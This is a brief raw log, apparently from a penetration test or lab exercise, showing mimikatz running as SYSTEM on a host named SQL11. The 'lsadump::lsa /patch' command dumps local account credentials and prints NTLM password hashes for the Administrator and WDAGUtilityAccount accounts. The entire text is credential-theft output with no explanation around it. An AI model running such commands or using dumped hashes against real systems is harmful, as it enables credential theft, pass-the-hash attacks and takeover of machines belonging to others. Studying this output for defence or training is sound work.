* Thread Token : {0;000003e7} 1 D 3812644 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::lsa /patch
Domain : SQL11 / S-1-5-21-2852705690-387487691-3395496674
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 8388d07604009d14cbb78f7d37b9e887
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : f90cd2b4344b58aaff84e0ba6edd8550
mimikatz(commandline) # exit
Bye!
c:\\Windows\\Tasks>